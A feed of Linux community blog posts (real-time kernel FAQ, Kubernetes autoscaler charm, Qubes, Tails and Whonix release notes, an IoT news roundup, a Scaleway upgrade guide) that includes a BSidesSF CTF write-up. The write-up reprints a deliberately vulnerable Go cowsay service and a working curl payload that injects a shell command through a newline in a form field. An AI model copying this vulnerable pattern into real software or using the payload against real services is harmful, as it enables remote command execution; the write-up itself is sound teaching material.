A9) Those are not currently in the plans, but that could change in the future.

Q10) Why would someone pick PREEMPT_RT over a hard real-time solution like Xenomai?

A10) Hard-real-time solutions are expensive and require specific hardware.

Q11) When do you expect PREEMPT_RT to be fully upstreamed?

A11) This is not within Canonical’s control. PREEMPT_RT, the de-facto Linux real-time implementation, is hosted by the Linux Foundation and is slowly being mainlined. Whereas a relevant portion of the locking is in mainline, the upstream patch set still provides much code.

Q12) How does PREEMPT_RT reduce scheduling and interrupt latency? 

A12) PREEMPT_RT uses different locking mechanisms (e.g. preemptable spin locks) and a scheduler other than CFS. When enabling PREEMPT_RT, the kernel uses the real-time scheduling class, which has a higher priority over the CFS scheduler and provides the first-in-first-out and round-robin scheduling policies.

Q13) What is the maximum latency guaranteed by PREEMPT_RT?

A13) PREEMPT_RT does not currently guarantee any maximum latency.

Q14) What is the CPUfreq governor used in PREEMPT_RT?

A14) The CPU governor is currently set to CONFIG_CPU_FREQ_DEFAULT_GOV_ONDEMAND. The cpufrequtils package enables switching to the performance governor with: cpufreq-set -g performance

Join the free real-time Linux beta programme

Join our free beta programme today. We will keep you up-to-date with the latest news and efforts towards GA, and we will notify you first once the kernel is production-ready. By signing up, you may have the opportunity to establish an open communication channel with our team to provide feedback and share suggestions. 

Further reading

Do you want to work on your next device, but are unsure which OS to pick? Learn about the trade-offs between Yocto and Ubuntu Core now.

Are you are ready to get started on the #1 OS choice by developers? Learn about embedded Linux development on Ubuntu today.

08 June, 2022 10:09AM

June 07, 2022

Ubuntu Blog: The Kubernetes Autoscaler Charm

Managing a Kubernetes cluster is a complex endeavor. As demands on a cluster grow, increasing the number of deployed pods can help ease the load on the system. But what do you do when you run out of nodes to host those pods, or when the load decreases and some nodes are no longer needed? Manually adding or removing nodes is possible, but wouldn’t it be better if there was a way to automate that task? Fortunately, that’s exactly what the Kubernetes Autoscaler charm is for! 

Types of Autoscalers

Before diving into the details of the Kubernetes Autoscaler charm, it’s important to understand the different types of autoscaling that are possible in Kubernetes. 

There are three types of autoscaling available: horizontal pod autoscaling, vertical pod autoscaling, and cluster autoscaling. 

Horizontal Pod Autoscaling

Horizontal pod autoscaling involves responding to changes in cluster load by adding and removing pods. As workload demand increases, more pods are added. If the demand slows down, pods are removed.

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh6.googleusercontent.com/7niI3DV1JZKzDCpBs6_Z3oYHQQX-aP3sOFH6cNUjzH_4qWWZpLUdKfQM07_8QMfGeTh2HgV7qiBhWw8pKkIgmfntszYZP-eOXDz1OKNr91lWWyLSuoaH8Z22uCpwJhlQZZ98xM1Wa_MiAE-_ww" width="720" /> </noscript>
Horizontal Pod Autoscaling

Vertical Pod Autoscaling

Vertical pod autoscaling adjusts pod memory and CPU limits. When workload demand increases, the resource limits for a pod are increased. Similarly when the demand decreases, the resource limits are lowered. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh6.googleusercontent.com/RpsOffcNuAd2ADxYUrLz_FFGlatsPWZ8v-Aic4DOA1foCP-3hM2YEL4lz8caPg4kQm8OWaB5uxGVWVNBjAAPhkAu1IIXGMIMi1ETMiz16SnC7PH3b48Mpu57lqmC8__JpwqfO2XGXzs512_Hmw" width="720" /> </noscript>
Vertical Pod Autoscaling

Cluster Autoscaling

Cluster autoscaling scales the cluster itself, adding nodes to accommodate unscheduled pods, and removing nodes when they become underutilized. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh3.googleusercontent.com/YHjyyRV4-R3cDM5XcMCSbKI46WCRpUEQHEQunsfW0zV3QcV1Bv60htJIhLjaKg5caCUe8wrlHk6HcmOPUWmnTIUfXuYlei37wxvUsCccN38a-QpN6hROhmihjbiTZ5s2k-tsDcUliVS6fOpLVA" width="720" /> </noscript>
Cluster Autoscaling

The Kubernetes Autoscaler charm is a cluster autoscaler

Why would you want to use a cluster autoscaler?

Using a cluster autoscaler allows you to automatically resize your cluster, increasing the number of nodes to meet pod scheduling requirements. On the other hand, the autoscaler can also remove nodes that are not being used. This can save you money, as you can stop using machines that are no longer necessary. A cluster autoscaler can help you maintain a cluster that is just the right size for your current needs. 

How does the Kubernetes Autoscaler Charm work?

The Kubernetes Autoscaler charm is designed to run on top of a Charmed Kubernetes cluster. Once deployed, the autoscaler interacts directly with Juju in order to respond to changing cluster demands. Remember, cluster autoscaling involves adding and removing nodes, so when pods are unable to be scheduled, or if a node is not being fully utilized, the autoscaler charm uses Juju constructs to resolve these issues.

Scale up

When the scheduler is unable to find a node to place a pod on, it will mark that pod as unschedulable. The autoscaler watches for unschedulable pods, and responds by sending a request to Juju asking that a unit be added to the Kubernetes worker application. Juju then adds a unit resulting in a new node being added to the cluster. The pod can then be scheduled on the new node. Problem solved!

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh6.googleusercontent.com/Tswy1bHkhZKJJ75JWqF3oovt-qlGO8IYhkGAST85E3c0d6aTBjdbswSpSB5THwX-DW2JwMJ5y-3iqQARqgyL1IX16mBU-uw0kc3AEXZaGK24eU_NZJHqMY_KJIgH30e4Xq5wkUWVa9-TVwrzSw" width="720" /> </noscript>
Scale Up Process

Scale down

The autoscaler periodically checks to see if any nodes are being underutilized. If it finds an underutilized node, it will attempt to move all the pods currently running on that node to other nodes. Once the node is empty, the autoscaler sends a remove-unit request to Juju to remove the now-empty node. Juju removes the unit from the worker application, which results in the node being removed from the cluster. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/FOk33AFBTpfeS5JjGyYR9gNGaFX0GuNRlT08LV6P1SiM57LFARdOUsPLCGsmociiVZrDu2TinBUrXh5CafOhRHrnGkTHP2xaOk1i1xIPqdIpZ-AqDt41Fuc-GrSBWhz4bilfQthuxg74ubNoxg" width="720" /> </noscript>
Scale Down Process

Wrapping up

Autoscaling is a complicated topic, but now you know a little more about the different types of solutions available. You also learned how the Kubernetes Autoscaler charm can solve some of the common problems associated with responding to changing cluster demands, and gained insight into how the autoscaler charm works internally.  

Demo

What next

  • Read the docs to learn how to deploy and configure the Kubernetes Autoscaler charm
  • Deploy the autoscaler charm from Charmhub

07 June, 2022 08:50PM

Salih Emin: Hello world!

Welcome to WordPress. This is your first post. Edit or delete it, then start writing!

07 June, 2022 09:00AM

David Tomaschik: BSidesSF 2022 CTF: Cow Say What?

As the author of the Cow Say What? challenge from this year’s BSidesSF CTF, I got a lot of questions about it after the CTF ended. It’s both surprisingly straight-forward but also a very little-known issue.

The challenge was a web challenge – if you visited the service, you got a page providing a textarea for input to the cowsay program, as well as a drop down for the style of the cow saying something (plain, stoned, dead, etc.). There was a link to the source code, reproduced here:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
package main

import (
	"fmt"
	"html/template"
	"io"
	"log"
	"net/http"
	"os"
	"os/exec"
	"regexp"
)

const (
	COWSAY_PATH = "/usr/games/cowsay"
)

var (
	modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")
)

// Note: mode must be validated prior to running this!
func cowsay(mode, message string) (string, error) {
	cowcmd := fmt.Sprintf("%s %s -n", COWSAY_PATH, mode)
	log.Printf("Running cowsay as: %s", cowcmd)
	cmd := exec.Command("/bin/sh", "-c", cowcmd)
	stdin, err := cmd.StdinPipe()
	if err != nil {
		return "", err
	}
	go func() {
		defer stdin.Close()
		io.WriteString(stdin, message)
	}()
	outbuf, err := cmd.Output()
	if err != nil {
		return "", err
	}
	return string(outbuf), nil
}

func checkMode(mode string) error {
	if mode == "" {
		return nil
	}
	if !modeRE.MatchString(mode) {
		return fmt.Errorf("Mode must match regexp: %s", modeRE.String())
	}
	return nil
}

const cowTemplateSource = `
<!doctype html>
<html>
	<h1>Cow Say What?</h1>
	<p>I love <a href='https://www.mankier.com/1/cowsay'>cowsay</a> so much that
	I wanted to bring it to the web.  Enjoy!</p>
	{{if .Error}}
	<p><b>{{.Error}}</b></p>
	{{end}}
	<form method="POST" action="/">
	<select name="mode">
		<option value="">Plain</option>
		<option value="-b">Borg</option>
		<option value="-d">Dead</option>
		<option value="-g">Greedy</option>
		<option value="-p">Paranoid</option>
		<option value="-s">Stoned</option>
		<option value="-t">Tired</option>
		<option value="-w">Wired</option>
	</select><br />
	<textarea name="message" placeholder="message" cols="60" rows="10">{{.Message}}</textarea><br />
	<input type='submit' value='Say'><br />
	</form>
	{{if .CowSay}}
	<pre>{{.CowSay}}</pre>
	{{end}}
	<p>Check out <a href='/cowsay.go'>how it works</a>.</p>
</html>
`

var cowTemplate = template.Must(template.New("cowsay").Parse(cowTemplateSource))

type tmplVars struct {
	Error   string
	CowSay  string
	Message string
}

func cowsayHandler(w http.ResponseWriter, r *http.Request) {
	vars := tmplVars{}
	if r.Method == http.MethodPost {
		mode := r.FormValue("mode")
		message := r.FormValue("message")
		vars.Message = message
		if err := checkMode(mode); err != nil {
			vars.Error = err.Error()
		} else {
			if said, err := cowsay(mode, message); err != nil {
				log.Printf("Error running cowsay: %v", err)
				vars.Error = "An error occurred running cowsay."
			} else {
				vars.CowSay = said
			}
		}
	}
	cowTemplate.Execute(w, vars)
}

func sourceHandler(w http.ResponseWriter, r *http.Request) {
	http.ServeFile(w, r, "cowsay.go")
}

func main() {
	addr := "0.0.0.0:6789"
	if len(os.Args) > 1 {
		addr = os.Args[1]
	}
	http.HandleFunc("/cowsay.go", sourceHandler)
	http.HandleFunc("/", cowsayHandler)
	log.Fatal(http.ListenAndServe(addr, nil))
}

There’s a few things to unpack here, but probably most significant is that the cowsay output is produced by invoking an external program. Notably, it passes the message via stdin, and the mode as an argument to the program. The entire program is invoked via sh -c, which makes this similar to the system(3) libc function.

The mode is validated via a regular expression. As Jamie Zawinski was opined (and Jeff Atwood has commented on):

Some people, when confronted with a problem, think “I know, I’ll use regular expressions.” Now they have two problems.

Well, it turns out we do have two problems. Our regular expression is given by the statement:

1
modeRE = regexp.MustCompilePOSIX("^-(b|d|g|p|s|t|w)$")

We can use a tool like regex101.com to play around with our expression. Specifically, it appears that it should consist of a - followed by one of the characters separated by pipes within the parentheses. At first, this appears pretty limiting, however, if we examine the Go regexp documentation, we might notice a few oddities. Specifically, ^ is defined as “at beginning of text or line (flag m=true)” and $ as “at end of text … or line (flag m=true)”. So apparently two of our special characters have different meanings depending on some “flags”.

There are no flags in our regular expression, so we’re using whatever the defaults are. Looking at the documentation for Flags, we see that there are two default sets of flags: Perl and POSIX. Slightly strangely, the constants use an inverted meaning for the m flag: OneLine, which causes the regular expression engine to “treat ^ and $ as only matching at beginning and end of text”. This flag is not included in POSIX (in fact, no flags are), so in a POSIX RE, ^ and $ match the beginning and end of lines respectively.

Our test for the Regexp to match is MatchString, which is documented as:

MatchString reports whether the string s contains any match of the regular expression re.

Note that the test is “contains any match”. If ^ and $ matched beginning and end of input, that would require the entire string to match, but since they are matching beginning and end of line, so long as the input contains a line matching the regular expression, then MatchString will return true.

This now means we can pass arbitrary input via the mode parameter, which will be directly interpolated into the string passed to sh -c. Put another way, we now have a Command Injection vulnerability. We just need to also include a line that matches our regular expression.

To send a parameter containing a newline, we merely need to URL encode (sometimes called percent encoding) the character, resulting in %0A. This can be exploited with a simple cURL command:

1
2
3
curl 'https://cow-say-what-473bf31e.challenges.bsidessf.net/' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  --data-raw 'mode=-d%0acat flag.txt #&message=foo'

The -d%0a matches the regular expression, then we have a command injected (cat flag.txt) and start a comment (#) to just ignore the rest of the command.

1
2
3
4
5
6
7
8
9
 _____
< foo >
 -----
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
CTF{dont_have_a_cow_have_a_flag}

07 June, 2022 07:00AM

hackergotchi for Qubes

Qubes

Fedora 34 has reached EOL

As a reminder following our previous announcement, Fedora 34 has now reached EOL (end-of-life). If you have not already done so, we strongly recommend upgrading all remaining Fedora 34 templates and standalones to Fedora 35 immediately.

We provide fresh Fedora 35 template packages through the official Qubes repositories, which you can install in dom0 by following the standard installation instructions. Alternatively, we also provide step-by-step instructions for performing an in-place upgrade of an existing Fedora template. After upgrading your templates, please remember to switch all qubes that were using the old template to use the new one.

For a complete list of template releases that are supported for your specific Qubes release, see our supported template releases.

Please note that no user action is required regarding the OS version in dom0. For details, please see our note on dom0 and EOL.

07 June, 2022 12:00AM

June 06, 2022

hackergotchi for Ubuntu

Ubuntu

Ubuntu Weekly Newsletter Issue 738

Welcome to the Ubuntu Weekly Newsletter, Issue 738 for the week of May 29 – June 4, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

06 June, 2022 10:56PM by guiverc

hackergotchi for Purism PureOS

Purism PureOS

The Ultimate Guide to Free Software

In a world that wants to track every move you make, we think it’s important to have alternatives that are free, open and respect your digital rights. Purism is a company dedicated to freedom, privacy, and security. At Purism, we make freedom-respecting hardware, software and online services. Software is the life-blood of any hardware. If […]

The post The Ultimate Guide to Free Software appeared first on Purism.

06 June, 2022 03:30PM by David Hamner

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Blog: The State of IoT – May 2022

Welcome to the May edition of the monthly State of IoT series

May was a month full of exciting news, from open-source GPU modules and alternatives to the Jetson to a new Matter-ready hub for smart home appliances.

Before diving straight in, let’s cover noteworthy news not included in the recap below.

A few tech companies announced interesting partnerships this month.

Without further ado, let’s now go deeper into the most prominent news across the IoT landscape from last month.

NVIDIA open-sources GPU kernel modules

Back in the day, Linux developers wishing to steer clear of NVIDIA’s proprietary stack reverse-engineered its GPU features into what was named the Nouveau project. Much has changed since Linus snubbed NVIDIA in 2012 for hiding from the FOSS world. 

A couple of years later, the chipmaker provided significant technical guidance and was involved in architectural changes to Nouveau to support the GK20A GPU for Tegra K1 chips. Those contributions even earned them a “thumbs up” by Linus himself. 

Despite NVIDIA’s best efforts to offer Linux driver support with their proprietary stack, Intel and AMD’s decade-long open-source driver effort called for more contributions from the graphic card maker. In August 2020, NVIDIA unveiled its open-source GPU documentation GitHub page, generating suspicions of it conceding its purely proprietary culture.

<noscript> <img alt="" height="234" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_416,h_234/https://lh6.googleusercontent.com/GY-NkQZ8juB1GBE44KTQ4k06yf6WHGRgcfqA9QryG9oI5D5AC2JL64RTIQ-SLAEcG86HBHwMNueuCE2lHk-73VlU7QqEShvGN6jjlfsTp2KRd7JwtPdxs4N9dYdoslC1DGE6TFCOPQwwDP-s6Q" width="416" /> </noscript>
NVIDIA Releases Open-Source GPU Kernel Modules

This month, NVIDIA finally open-sourced kernel modules for their GPUs. With what was by now a much-awaited transition towards the landscape of open-source software, the silicon vendor released the kernel driver under a dual MIT/GPL license. Cindy Goldberg, VP of Silicon alliances at Canonical, noted how the new NVIDIA open-source GPU kernel modules simplify installs and increase security for Ubuntu consumers, whether AI/ML developers, gamers or cloud users. 

It’s worth mentioning that NVIDIA didn’t upstream the out-of-tree, open-source kernel drivers. Furthermore, because there can only be one driver for the same hardware in the Linux kernel, upstreaming will require lots of work in the Mesa graphics library and Nouveau. Also, one can’t avoid noting that most modern graphics drivers still reside in the closed-source firmware and userspace components. Hector Martin from Asahi Linux criticised NVIDIA for moving most of the kernel driver into the firmware, called into by the open-sourced components. 

AMD releases new robotics starter kit

Last May, AMD unveiled the Kria™ KR260 Robotics Starter Kit for robotics and industrial applications.

Compared to chip-down design, the Kria adaptive system-on-module (SOM) approach accelerates the design cycle and shortens the time to deployment by up to nine-month. AMD is targeting rapid robotics deployment at a compelling price with its latest release. 

As a new addition to the Kria portfolio, the KR260 Kit is a complete development platform for robotics applications, machine vision, industrial communication and control. The Kria KR260 Starter Kit (Kria SOM + Carrier Card + Thermal Solution) offers native support for ROS 2, the de-facto open-source framework for building robot solutions. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/GOGTuOcp7ZOrCVDPSGybq1kL2c0URgduMzkWJ7OtcllJpYxzHkkmRinJGg_DcQepwFEg1c_6Gn31WRbdWNqHHZ6G8j2-lfMBBOqccg5NomVv2_GNgpvGQGQ3H_eCfUn830L2uHKlduIsqDehng" width="720" /> </noscript>
Getting Started
with Kria KR260 Robotics Starter Kit

The Ubuntu 22.04 LTS operating system is the best choice to get up and running with the KR260. Robotics and industrial developers can now get started in minutes by following these steps.

IKEA launches a Matter-ready hub

Matter is a royalty-free IPv6-based connectivity standard which defines the application layer deployed on devices. The Matter specification supports Wi-Fi, Thread and Bluetooth Low Energy (BLE). Although proprietary, i.e. licensed by the Connectivity Standards Alliance (CSA), formerly Zigbee Alliance, the code is open-source

Last March, the CSA announced a delay in releasing the specification of Matter. Citing additional tests, Matter’s SDK will be feature-complete this spring, with Version 0.9 of the specification available to all Alliance members towards mid-year. We were expecting that the delay would push back the shipment of Matter-certified products. In May, however, IKEA announced a Matter-ready hub for smart products. 

<noscript> <img alt="" height="235" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_353,h_235/https://lh5.googleusercontent.com/jglsjxpeKV1SMx2P8rvYNIAGOyTMZct_COv4ThWRZ1hrCM0LvydHyCm-MyWT6FVvQeWtVtUTiDXiDcaV_vP0lfC_MVSEiRoPhykqrgcGCx0XSkyVOXC06iIU1x94CgA8or24iNT2hHpkiwFuOA" width="353" /> </noscript>
IKEA launches DIRIGERA, the Matter ready hub for smart products

Coupled with the IKEA Home smart app, the DIRIGERA hub aims to streamline the onboarding process when connecting appliances to the smart home. The Matter-ready hub and the app will be available in October, sustaining the continued growth in the smart home industry

Nokia unveils SaaS services for home device management

IKEA wasn’t the only player making moves in the smart home sector last May. Approaching the vertical from a different angle in the tech stack, Nokia announced two new Software-as-Service (SaaS) offerings.

Nokia Home Device Management is a Customer Premise Equipment (CPE)-vendor-agnostic system providing management capabilities ranging from zero-touch provisioning and configuration updates to software upgrades, moni­toring, and troubleshooting. Nokia touts their Device Manager solution supports any vendor and device, simplifying CPE management in home networks. 

<noscript> <img alt="" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_720/https://lh5.googleusercontent.com/HY6GQm3jko0jAznXSfCF_qlclqctf9QskM8pDSqLuWnghLqOcTaZ-KUJe6q58QHYJJhY8mw7Yx1coWE6DdTp8f0uMhV-NWh3cHaW1996OdReeb9kIKU4SFCHltTrQx8r8ylzlZtGoI80nVusCA" width="720" /> </noscript>
Automate remote management of home devices

The second service revealed by Nokia targets network energy efficiency.   Nokia AVA (Analytics Virtualization and Automation) for Energy SaaS aims to minimise the carbon footprint and network energy costs of telco networks. The new energy management automation platform uses AI to benchmark the energy efficiency of passive infrastructure, like batteries and power supplies.

Nokia AVA for Energy SaaS’ approach is in stark contrast with conventional energy-saving methods, relying on pre-defined static shutdown windows, unfit for complex savings scenarios. Nokia argues the new service aligns with its commitment to 50% emissions reduction between 2019 and 2030 across its value chain.

Qualcomm announces new robotics solutions

AMD’s wasn’t the only announcement in the robotics arena from last May. 

Qualcomm revealed its RB6 Platform and RB5 AMR Reference Design, aiming to bring AI and 5G capabilities to the next generation of autonomous mobile robots.

The Robotics RB6 Platform is an all-in-one hardware solution for autonomous robotics. Qualcomm’s new solution is Wi-Fi 6-ready and includes 5G connectivity with support for global sub-6GHz and mmWave bands. The RB6 Platform targets streamlined robotics development via its suite of AI SDKs, including multimedia, AI/ML and computer vision capabilities.

<noscript> <img alt="" height="213" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_328,h_213/https://lh5.googleusercontent.com/31rriZM8lkE-ZJMctNio7-r0MFbKj78hmyAwHaO98aYW6iSiS7EkqkQHL-1kvq2TXvndo3vYTTLDyjLYJPlePvAZ3Ol_QuvcRDJwkTGkrFWSnEUaKstACY2ExqvU-4eDJowsl9XiHphNi3cdhw" width="328" /> </noscript>
Qualcomm Robotics RB6 Platform

Branded as the first AMR reference design with integrated AI and 5G, the RB5 AMR builds on the company’s extensive AI and 5G portfolio. Qualcomm already has a readily-available 5G and AI-integrated solution for drones, the Flight RB5 5G Platform. Moving past autonomous flight, Qualcomm is now targeting indoor navigation capabilities for autonomous robots via its RB5 AMR Reference Design. The robotics RB5 AMR is allegedly capable of navigating in GPS-denied environments by relying on Simultaneous Localization and Mapping (SLAM), a class of algorithms targeting indoor navigation. The Reference Design is “coming soon” and those interested can sign up for an email notification to be the first to know once available. 

<noscript> <img alt="" height="228" src="https://res.cloudinary.com/canonical/image/fetch/f_auto,q_auto,fl_sanitize,c_fill,w_304,h_228/https://lh4.googleusercontent.com/cNTMMn7Kd8BkvT7vEOtzVX49uHvbOGZ0k5FQm1oMTc9iT33eP1ijSAyNQX-PqfeB1siXg_jgc9JSPTqareGlg-3bX_GwzLgxTdmgOcPOLrftVJqMUBSPYiLg7svyo1NT2bb39Qph0fSqaKHBaA" width="304" /> </noscript>
Qualcomm RB5 AMR Reference Design

Stay tuned for more IoT news

We will soon be back with next month’s summary of IoT news. Meanwhile, join the conversation on IoT Discourse to discuss everything related to the Internet of Things and tightly connected, embedded devices. 

Further reading

Why is Linux the OS of choice for IoT devices? Find out with the official guide to Linux for embedded applications

Do you want to work on your next IoT project, but are unsure which OS to pick? Learn about the trade-offs between Yocto and Ubuntu Core now.

In case you are ready to get started on the de-facto development platform for IoT, learn about embedded Linux development on Ubuntu.

If you need to go back to the basics, learn what is embedded Linux today.

06 June, 2022 10:20AM

June 05, 2022

hackergotchi for Whonix

Whonix

Whonix 16.0.5.0 - for VirtualBox - Point Release!

Whonix for VirtualBox

Download Whonix for VirtualBox:


This is a point release.


Major Changes


Upgrade

Alternatively, in-place release upgrade is possible upgrade using Whonix repository.


This release would not have been possible without the numerous supporters of Whonix!


Please Donate!


Please Contribute!


Changelog


Full difference of all changes

Comparing 16.0.4.2-developers-only...16.0.5.0-developers-only · derivative-maker/derivative-maker · GitHub

1 post - 1 participant

Read full topic

05 June, 2022 01:15PM by Patrick

June 04, 2022

hackergotchi for Tails

Tails

Tails 5.1 is out

This release fixes the security vulnerability in the JavaScript engine of Firefox and Tor Browser announced on May 24.

This release was delayed from May 31 to June 5 because of a delay in the release of Tor Browser 11.0.14.

Changes and updates

Tor Connection assistant

Tails 5.1 includes many improvements to the Tor Connection assistant:

  • The Tor Connection assistant now automatically fixes the computer clock if you choose to connect to Tor automatically.

    This makes is much easier for people in Asia to circumvent censorship.

    Tails learns the current time by connecting to the captive portal detection service of Fedora, which is used by most Linux distributions. This connection does not go through the Tor network and is an exception to our policy of only making Internet connections through the Tor network.

  • The time displayed in the top navigation uses the time zone selected when fixing the clock in the Tor Connection assistant.

    In the future, we will make it possible to change the displayed time zone for everybody from the desktop (#10819) and store it in the Persistent Storage (#12094).

  • The last screen of the Tor Connection assistant makes it clear whether you are connected using Tor bridges or not.

    Connected to Tor successfully with bridges

Unsafe Browser and captive portals

  • We wrote a new homepage for the Unsafe Browser when you are not connected to the Tor network yet. This new version makes it easier to understand how to sign in to the network using a captive portal.

    Example of captive portal: Free Wi-Fi hotspot

  • Tails now asks for confirmation before restarting when the Unsafe Browser was not enabled in the Welcome Screen. This prevents losing work too easily.

Kleopatra

  • Associate OpenPGP files with Kleopatra in the Files browser.

    You can now double-click on .gpg files to decrypt them.

  • Add Kleopatra to the Favorites applications.

Included software

  • Update tor to 0.4.7.7.

  • Update Tor Browser to 11.0.14.

  • Update Thunderbird to 91.9.

  • Update the Linux kernel to 5.10.113. This should improve the support for newer hardware: graphics, Wi-Fi, and so on.

Fixed problems

  • Remove the automatic selection of the option Configure a bridge when rolling back from the option to hide that you are connecting to Tor. (#18546)

  • Give the same instructions on both screens where you have to configure a bridge. (#18596)

  • Help rename the default KeePassXC database to open it automatically in the future. (#18966)

  • Fix sharing files using OnionShare from the Files browser. (#18990)

    Share via OnionShare

  • Disable search providers in the Activities overview: files, calculator, and terminal. (#18952)

For more details, read our changelog.

Known issues

None specific to this release.

See the list of long-standing issues.

Get Tails 5.1

To upgrade your Tails USB stick and keep your persistent storage

  • Automatic upgrades are available from Tails 5.0.

    You can reduce the size of the download of future automatic upgrades by doing a manual upgrade to the latest version.

  • If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.

To install Tails on a new USB stick

Follow our installation instructions:

The Persistent Storage on the USB stick will be lost if you install instead of upgrading.

To download only

If you don't need installation or upgrade instructions, you can download Tails 5.1 directly:

What's coming up?

Tails 5.2 is scheduled for June 28.

Have a look at our roadmap to see where we are heading to.

04 June, 2022 06:00PM

hackergotchi for Ubuntu developers

Ubuntu developers

Simos Xenitellis: How to upgrade your Scaleway server

You have a Scaleway Virtual Private Server (VPS) and you are considering upgrading your installed Linux distribution. Perhaps you have been notified by Scaleway to upgrade an old Linux version. The email asks you to upgrade but does not give you the necessary information on how to upgrade or how to avoid certain pitfalls.

Scaleway email: “Important Notice: End-Of-Life of Your Instance Images”

What could go wrong when you try to upgrade?

A few things can go wrong.

Watch out for Bootscripts

The most important thing that can go wrong, is if your VPS is using a bootscript. A bootscript is a fixed way for booting your Linux server and this included a generic Scaleway-provided Linux kernel. You would be running Ubuntu but the Linux kernel would be a common Scaleway Linux kernel among all Linux distributions. The config options would be set in stone and that would cause some issues. That situation changed and Scaleway now uses the distro Linux kernels. But since Scaleway sent an email about old Linux versions, then you need to check this one out.

To verify, go into the Advanced Settings, in Boot Mode. If it looks as follows, then you are using a bootscript. When you upgrade the Linux version, then the Linux kernel will stay the same as instructed by the bootscript. The proper Boot Mode should be “Use local boot” so that your VPS is using your distro’s Linux kernel. Fun fact #39192: If you offer Ubuntu to your users but you do not use the Ubuntu kernel, then Canonical does not grant you a (free) right to advertise that you are offering “Ubuntu” because it’s not really real Ubuntu (the Linux kernel is not a stock Ubuntu Linux kernel). Since around 2019 Scaleway would default with the Use local boot Boot Mode. In my case it was indeed Use local boot, therefore I did not have to deal with bootscripts. I just clicked on Use bootscript for the purposes for this post; I did not apply this change.

Boot Mode in the Scaleway Advanced Settings.

Verify that the console works (Serial console, recovery)

You normally connect to your Linux server using SSH. But what happens if something goes wrong and you lose access? Specifically, if you are upgrading your Linux installation? You need a separate way, a backup option, to connect back to the server. This is achieved with the Console. It opens up a browser window that gives you access to the Linux Console of the server, over the web. It’s separate from SSH, therefore if SSH access is not available but the server is still running, you can still access here. Note that when you upgrade Debian or Ubuntu over SSH with do-release-upgrade, the upgrader creates a screen session that you can detach and attach at will. If you lose SSH access, connect to the Console and attach there.

Link to open the Console.

Note two things.

  1. The Console in Scaleway does not work on Firefox. Anything that is based on chromium should work fine. It is not clear why it does not work. If you try to place your mouse cursor on the button, it shows Firefox is not currently compatible with the serial console.
  2. Make sure that you know the username and password of your non-root account on your Scaleway server. No, really. You would normally connect with SSH and Public-Key Authentication. For what is worth, the account could be locked. Try it out now and get a shell.

Beware of firewalls and security policies and security groups

When you are upgrading the distribution with Debian and Ubuntu, and you do so over SSH, the installer/upgrader will tell you that it will open a backup SSH server on a different port, like 1022. It will also tell you to open that port, if you use a Linux firewall on your server. If you plan to keep that as a backup option, note that Scaleway has a facility called Security Groups that works like a global firewall of your Scaleway servers. That is, you can block access to certain ports if you specify them in the Security Group, and you have assigned those Scaleway servers in that Security Group.

Therefore, if you plan to rely on access to port 1022, make sure that the Security Group does not block it.

How to avoid having things go wrong?

When you upgrade a Linux distribution, you are asked all sort of questions along the way. Most likely, the upgrader will ask if you want to keep back a certain configuration file, or if you want to have it replaced by the newer version.

If you are upgrading your Ubuntu server, you would install the ubuntu-release-upgrader-core package and then run do-release-upgrade.

$ sudo apt install ubuntu-release-upgrader-core
...
$ sudo do-release-upgrade
...

To avoid making a mistake here, you can launch a new Scaleway server with that old Linux distro version and perform an upgrade there. By doing so, you will note that you will be asked

  1. whether to keep your old SSH configuration or install a new one. Install the new one and make a note to apply later any changes from the old configuration.
  2. whether to be asked specifically which services to restart or let the system do these automatically. You would consider this if the server deals with a lot of traffic.
  3. whether to keep or install the new configuration for the Web server. Most likely you keep the old configuration. Or your Web servers will not start automatically and you need to fix the configuration files manually.
  4. whether you want to keep or update grub. AFAIK, grub is not used here, so the answer does not matter.
  5. whether you want to upgrade to the snap package of LXD. If you use LXD, you should have switched already to the snap package of LXD so that you are not asked here. If you do not use LXD, then before the upgrade you should uninstall LXD (the DEB version) so that the upgrade does not install the snap package of LXD. If the installer decides that you must upgrade LXD, you cannot select to skip it; you will get the snap package of LXD.

Here are some relevant screenshots.

You are upgrading over SSH so you are getting an extra SSH server for your safety.
How it looks when you upgrade from a pristine Ubuntu 16.04 to Ubuntu 18.04.
